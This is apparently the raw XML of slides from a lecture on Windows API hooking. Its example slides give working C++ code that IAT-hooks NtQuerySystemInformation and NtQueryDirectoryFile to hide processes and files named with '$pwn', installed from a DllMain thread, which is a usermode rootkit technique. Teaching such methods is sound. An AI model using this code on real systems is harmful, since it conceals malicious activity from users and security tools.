              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>  [in]            LPTHREAD_START_ROUTINE  lpStartAddress,</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>  [in, optional]  __drv_aliasesMem LPVOID lpParameter,</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>  [in]            DWORD                   dwCreationFlags,</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>  [out, optional] LPDWORD                 lpThreadId</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="11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p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="组合 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7280275" y="1387475"/>
            <a:ext cx="4805045" cy="2259965"/>
            <a:chOff x="11465" y="1605"/>
            <a:chExt cx="7567" cy="3559"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="圆角矩形 2"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11465" y="1605"/>
              <a:ext cx="7567" cy="3559"/>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11466" y="2004"/>
              <a:ext cx="7566" cy="2761"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:pPr marL="720090" indent="-539750" algn="l" fontAlgn="auto">
                <a:buSzPct val="150000"/>
                <a:buBlip>
                  <a:blip r:embed="rId6"/>
                </a:buBlip>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2700">
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Creates a thread to execute within the virtual address space of the calling process.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2700">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34"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Example-Hook and hide process information</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 name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6393815"/>
            <a:ext cx="12364085" cy="61023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Text Box 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="241300" y="1036320"/>
            <a:ext cx="11823700" cy="10686415"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E74C3C">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>#define STATUS_SUCCESS  ((NTSTATUS)0x00000000L)</a:t>
            </a:r>
            <a:endParaRPr sz="1500">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using lpNtQuerySystemInformation = NTSTATUS (WINAPI *)(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);</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lpNtQuerySystemInformation lpOrgNtQuerySystemInformation;</a:t>
            </a:r>
            <a:endParaRPr sz="1500">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using lpNtQueryDirectoryFile = NTSTATUS (WINAPI *)(HANDLE FileHandle, HANDLE Event, PIO_APC_ROUTINE ApcRoutine, PVOID ApcContext, PIO_STATUS_BLOCK IoStatusBlock, PVOID FileInformation, ULONG Length, FILE_INFORMATION_CLASS FileInformationClass, BOOLEAN ReturnSingleEntry, PUNICODE_STRING FileName, BOOLEAN RestartScan);</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lpNtQueryDirectoryFile lpOrgNtQueryDirectoryFile;</a:t>
            </a:r>
            <a:endParaRPr sz="1500">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char lpCurrentProcessName[MAX_PATH];</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char lpCurrentDirectoryName[MAX_PATH];</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>//this function is to hide certain processes with name including "$pwn"</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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NTSTATUS WINAPI hkNtQuerySystemInformation(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength)</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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//returns information about </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>processes</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const NTSTATUS QueryStatus = lpOrgNtQuerySystemInformation(SystemInformationClass, SystemInformation, SystemInformationLength,ReturnLength);</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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if (SystemInformationClass == _SYSTEM_INFORMATION_CLASS::SystemProcessInformation &amp;&amp; QueryStatus == STATUS_SUCCESS)</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PSYSTEM_PROCESS_INFORMATION lpCurrentProcess; //process information</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auto lpNextProcess = (PSYSTEM_PROCESS_INFORMATION)SystemInformation;</a:t>
            </a:r>
            <a:endParaRPr sz="1500">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do</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lpCurrentProcess = lpNextProcess;</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lpNextProcess = (PSYSTEM_PROCESS_INFORMATION)((DWORD_PTR)lpCurrentProcess + lpCurrentProcess-&gt;NextEntryOffset); //obtain the next process information</a:t>
            </a:r>
            <a:endParaRPr sz="1500">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wcstombs_s(nullptr, lpCurrentProcessName, lpNextProcess-&gt;ImageName.Buffer, MAX_PATH); //Converts a sequence of wide characters to a corresponding sequence of multibyte characters</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lpCurrentProcessName[MAX_PATH - 1] = '\0';</a:t>
            </a:r>
            <a:endParaRPr sz="1500">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if (StrStrIA(lpCurrentProcessName, "$pwn"))</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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if (lpNextProcess-&gt;NextEntryOffset == 0)   //trying to hide the next process ("$pwn")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> //it’s the last process</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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lpCurrentProcess-&gt;NextEntryOffset = 0;</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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else</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lpCurrentProcess-&gt;NextEntryOffset += lpNextProcess-&gt;NextEntryOffset;</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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lpNextProcess = lpCurrentProcess;</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 while (lpCurrentProcess-&gt;NextEntryOffset != 0);</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return QueryStatus;</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a:t>
            </a:r>
            <a:endParaRPr sz="150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777222 " pathEditMode="relative" ptsTypes="">
                                      <p:cBhvr>
                                        <p:cTn id="6"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Example-Hook and hide file information</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 name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6393815"/>
            <a:ext cx="12364085" cy="61023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Text Box 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="240030" y="1038860"/>
            <a:ext cx="11711940" cy="8632190"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E74C3C">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>//this function is to hide certain files with name including "$pwn"</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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NTSTATUS WINAPI hkNtQueryDirectoryFile(HANDLE FileHandle, HANDLE Event, PIO_APC_ROUTINE ApcRoutine, PVOID ApcContext, PIO_STATUS_BLOCK IoStatusBlock, PVOID FileInformation, ULONG Length, FILE_INFORMATION_CLASS FileInformationClass, BOOLEAN ReturnSingleEntry, PUNICODE_STRING FileName, BOOLEAN RestartScan)</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//returns information about files and directories in a directory</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const NTSTATUS QueryStatus = lpOrgNtQueryDirectoryFile(FileHandle, Event, ApcRoutine, ApcContext, IoStatusBlock, FileInformation, Length, FileInformationClass, ReturnSingleEntry, FileName, RestartScan); </a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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if (FileInformationClass == FILE_INFORMATION_CLASS::FileIdBothDirectoryInformation &amp;&amp; QueryStatus == STATUS_SUCCESS)</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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PFILE_ID_BOTH_DIR_INFORMATION lpCurrentDirectory;</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auto lpNextDirectory = (PFILE_ID_BOTH_DIR_INFORMATION)FileInformation;</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do</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lpCurrentDirectory = lpNextDirectory;</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lpNextDirectory = (PFILE_ID_BOTH_DIR_INFORMATION)((DWORD_PTR)lpCurrentDirectory + lpCurrentDirectory-&gt;NextEntryOffset); //obtain the next file information</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wcstombs_s(nullptr, lpCurrentDirectoryName, lpNextDirectory-&gt;FileName, MAX_PATH); //Converts a sequence of wide characters to a corresponding sequence of multibyte characters</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lpCurrentDirectoryName[MAX_PATH - 1] = '\0';</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if (StrStrIA(lpCurrentDirectoryName, "$pwn")) //trying to hide the next file ("$pwn")</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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if (lpNextDirectory-&gt;NextEntryOffset == 0)</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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lpCurrentDirectory-&gt;NextEntryOffset = 0;</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else</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lpCurrentDirectory-&gt;NextEntryOffset += lpNextDirectory-&gt;NextEntryOffset;</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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lpNextDirectory = lpCurrentDirectory;</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 while (lpCurrentDirectory-&gt;NextEntryOffset != 0);</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return QueryStatus;</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a:t>
            </a:r>
            <a:endParaRPr sz="150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5625 0 L 0.00505208 -0.593426 " pathEditMode="relative" rAng="0" ptsTypes="">
                                      <p:cBhvr>
                                        <p:cTn id="6" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="-3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Example-DllMain</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 name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6393815"/>
            <a:ext cx="12364085" cy="61023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Text Box 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="194310" y="1047115"/>
            <a:ext cx="11803380" cy="9093835"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E74C3C">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>void InitHook()//hook NtQuerySystemInformation by self defined hkNtQuerySystemInformation and NtQueryDirectoryFile by self defined hkNtQueryDirectoryFile</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lpOrgNtQuerySystemInformation = (lpNtQuerySystemInformation) IAT::Hook("ntdll.dll", "NtQuerySystemInformation", &amp;hkNtQuerySystemInformation);</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lpOrgNtQueryDirectoryFile = (lpNtQueryDirectoryFile) IAT::Hook("ntdll.dll", "NtQueryDirectoryFile", &amp;hkNtQueryDirectoryFile, "windows.storage.dll");</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ExitThread(0);</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void RemoveHookAndFreeLibrary(const HMODULE hModule)</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IAT::Hook("ntdll.dll", "NtQuerySystemInformation", (LPVOID)lpOrgNtQuerySystemInformation);</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IAT::Hook("ntdll.dll", "NtQueryDirectoryFile", (LPVOID)lpOrgNtQueryDirectoryFile, "windows.storage.dll");</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FreeLibraryAndExitThread(hModule, 0);</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BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)</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switch (ul_reason_for_call)</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case DLL_PROCESS_ATTACH :</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DisableThreadLibraryCalls(hModule); //Disables the DLL_THREAD_ATTACH and DLL_THREAD_DETACH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>notifications for the specified dynamic-link library (DLL).</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CreateThread(nullptr, NULL, (LPTHREAD_START_ROUTINE)InitHook, nullptr, 0, nullptr);</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break;</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case DLL_PROCESS_DETACH :</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RemoveHookAndFreeLibrary(hModule);</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break;</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default:</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return FALSE;</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return TRUE;</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a:t>
            </a:r>
            <a:endParaRPr sz="150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505208 -0.571574 " pathEditMode="relative" rAng="0" ptsTypes="">
                                      <p:cBhvr>
                                        <p:cTn id="6" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="-2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GetProcessImageFileNameA</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536575" y="4344670"/>
            <a:ext cx="11655425" cy="1509395"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="10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[in] hProcess</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A handle to the process.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="10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[out] lpImageFileName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>:</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A pointer to a buffer that receives the full path to the executable file.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="10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[in] nSize</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 size of the lpImageFileName buffer, in characters.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Text Box 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793115" y="1235075"/>
            <a:ext cx="5170805" cy="2861310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D1202F">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="D1202F"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>DWORD GetProcessImageFileNameA(</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>  [in]  HANDLE hProcess,</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>  [out] LPSTR  lpImageFileName,</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>  [in]  DWORD  nSize</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="组合 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="6594475" y="1758315"/>
            <a:ext cx="4805045" cy="1814830"/>
            <a:chOff x="11465" y="2185"/>
            <a:chExt cx="7567" cy="2858"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="圆角矩形 2"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11465" y="2185"/>
              <a:ext cx="7567" cy="2859"/>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11466" y="2561"/>
              <a:ext cx="7566" cy="2107"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:pPr marL="720090" indent="-539750" algn="l" fontAlgn="auto">
                <a:buSzPct val="150000"/>
                <a:buBlip>
                  <a:blip r:embed="rId6"/>
                </a:buBlip>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2700">
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Retrieves the name of the executable file for the specified process.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2700">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"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568515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pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Overview</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cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="组合 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3240405" y="1941195"/>
            <a:ext cx="5711190" cy="3220720"/>
            <a:chOff x="4964" y="3057"/>
            <a:chExt cx="8994" cy="5072"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="5" name="组合 4"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="0">
              <a:off x="4964" y="6115"/>
              <a:ext cx="8995" cy="2014"/>
              <a:chOff x="1726" y="2132"/>
              <a:chExt cx="8995" cy="2014"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="13" name="圆角矩形 6"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId1"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2238" y="2251"/>
                <a:ext cx="8483" cy="1776"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 50000"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="20E4F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4" name="椭圆 13"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId2"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1726" y="2132"/>
                <a:ext cx="2014" cy="2014"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="08BDCD"/>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6" name="椭圆 15"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId3"/>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7" name="文本框 16"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId4"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1864" y="2665"/>
                <a:ext cx="1736" cy="949"/>
              </a:xfrm>
